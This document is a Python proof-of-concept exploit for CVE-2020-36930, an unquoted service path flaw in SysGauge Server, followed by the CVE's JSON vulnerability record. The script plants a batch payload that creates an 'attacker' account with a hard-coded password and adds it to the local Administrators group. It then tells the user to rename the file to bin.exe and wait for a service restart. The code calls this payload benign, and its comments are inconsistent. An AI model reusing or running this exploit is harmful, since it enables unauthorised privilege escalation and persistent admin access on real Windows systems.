CVE-2020-36930

# CVE-2020-36930 SysGauge Server Unquoted Service Path PoC # This PoC demonstrates the unquoted service path vulnerability # Usage: Run with local administrator privileges import os import sys import subprocess import shutil def check_vulnerability(): """Check if SysGauge Server is installed and vulnerable""" paths_to_check = [ r'C:\Program Files\SysGauge Server\bin\sysgaus.exe', r'C:\Program Files\SysGauge Server\bin\sysgauges.exe' ] for path in paths_to_check: if os.path.exists(path): print(f'[+] SysGauge executable found: {path}') return True return False def create_malicious_executable(): """Create a malicious executable to be placed in unquoted path""" malicious_path = r'C:\Program Files\SysGauge Server\bin.exe' # Create a simple reverse shell payload # In real attack, this would be actual malicious code print(f'[*] Creating malicious executable at: {malicious_path}') print('[*] Payload: Creates a new admin user and adds to Administrators group') # For demonstration, create a benign script that shows the vulnerability malicious_code = ''' @echo off echo [+] Malicious executable executed via unquoted path! >> C:\\temp\\poc_log.txt net user attacker P@ssw0rd123! /add >> C:\\temp\\poc_log.txt 2>&1 net localgroup Administrators attacker /add >> C:\\temp\\poc_log.txt 2>&1 echo [+] Privilege escalation successful >> C:\\temp\\poc_log.txt ''' os.makedirs(r'C:\temp', exist_ok=True) with open(malicious_path.replace('.exe', '.bat'), 'w') as f: f.write(malicious_code) print(f'[+] Malicious script created: {malicious_path.replace(".exe", ".bat")}') return malicious_path def exploit(): """Execute the exploit""" print('[*] CVE-2020-36930 Exploit - SysGauge Server Unquoted Service Path') print('[*] Target: SysGauge Server <= 7.9.18') print('=' * 60) if not check_vulnerability(): print('[-] SysGauge Server not found or not installed') return False print('[+] Target is potentially vulnerable') malicious_path = create_malicious_executable() print('[+] To complete exploitation:') print(f' 1. Rename {malicious_path.replace(".exe", ".bat")} to bin.exe') print(' 2. Wait for SysGauge service restart or system reboot') print(' 3. Check C:\\temp\\poc_log.txt for results') print('[*] Note: Requires service restart to trigger the malicious executable') return True if __name__ == '__main__': exploit()

{"cve": {"id": "CVE-2020-36930", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:20.500", "lastModified": "2026-02-09T15:01:00.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SysGauge Server 7.9.18 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\SysGauge Server\\bin\\sysgaus.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "SysGauge Server 7.9.18 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su ruta binaria que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\SysGauge Server\\bin\\sysgaus.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexense:sysgauge:7.9.18:*:*:*:*:*:*:*", "matchCriteriaId": "22D1159E-AD36-4A5C-9D80-23FB6F8B2779"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50009", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.sysgauge.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/sysgauge-sysgauge-server-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50009", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}